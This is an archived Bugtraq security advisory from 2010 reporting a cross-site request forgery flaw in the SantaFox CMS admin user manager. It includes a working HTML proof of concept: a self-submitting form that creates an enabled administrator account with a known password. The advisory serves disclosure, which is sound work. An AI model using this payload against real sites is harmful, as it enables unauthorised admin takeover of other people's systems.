Bugtraq mailing list archives

XSRF (CSRF) in SantaFox


From: advisory () htbridge ch
Date: Wed, 15 Sep 2010 15:10:21 +0200 (CEST)

Vulnerability ID: HTB22594
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_santafox.html
Product: SantaFox
Vendor: artprom ( http://www.santafox.ru/ ) 
Vulnerable Version: 2.02 and Probably Prior Versions
Vendor Notification: 23 August 2010 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "admin/manager_users.class.php" script to properly verify the source of 
HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based 
authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/index.php?action=set_left_menu&leftmenu=save_admin&id=-1"; method="post" name="main" >
<input type="hidden" name="login" value="Admin" />
<input type="hidden" name="full_name" value="Admin" />
<input type="hidden" name="pass" value="Admin" />
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="codepage" value="" />
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="select_group[1]" value="on" />
<input type="hidden" name="select_group[2]" value="on" />
</form>
<script>
document.main.submit();
</script>




Current thread: